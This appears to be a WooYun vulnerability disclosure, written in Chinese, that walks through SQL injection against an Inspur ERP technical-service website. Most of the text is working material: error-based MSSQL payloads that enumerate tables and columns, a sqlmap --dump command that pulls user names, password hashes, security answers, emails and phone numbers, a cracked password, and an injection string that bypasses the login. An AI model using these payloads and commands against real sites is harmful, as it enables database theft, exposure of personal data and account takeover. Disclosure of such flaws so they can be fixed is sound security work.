WooYun.org

1、很巧合的打开了浪潮ERP技术服务网，习惯性的抓包丢到sqlmap里面，很快出结果了，username参数存在注入。

2、但是继续爆表的时候出错了，一个表也没爆出来。看来这个asp站点，数据库的表和字段都很奇葩。那就只好手工注入了。
3、输入

'having 1=1--

，报错

由此可知：此处存在表wz_userqt，且其中一个字段为wz_userqtid
4、继续爆其他字段

1' and 1=convert(int,(select top 1 col_name(object_id (' wz_userqt '),2) from wz_userqt)) and '1'='1

存在一个字段为x_userqtname
5、以此可爆出20个字段。其中比较重要的有：x_userqtname,x_userqtpassword,mmwt,mmda,email,sex,company,phone,mobile
6、接下来就用sqlmap跑一下字段里的内容。但是不知道上述爆出来的表和字段是哪个数据库的，那就每个数据库都跑一遍，有数据的自然是对应的数据库。果然经过测试数据库是tr。

Sqlmap -l d:/post.txt -D tr -T wz_userqt -C "x_userqtname,x_userqtpassword,mmwt,mmda,email,sex,company,phone,mobile" --dump

7、cmd5破解密码为123456.

8、但是登陆的时候报错。

9、没关系，绕一下就可以了。
用户名为

a%' and (select is_member('db_owner'))=1--

密码为123456

这里只是爆出了管理员表，其他的也就不管了，关兴趣的可以使用如下代码爆出。

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('wz_userqt' ))) and '1'='1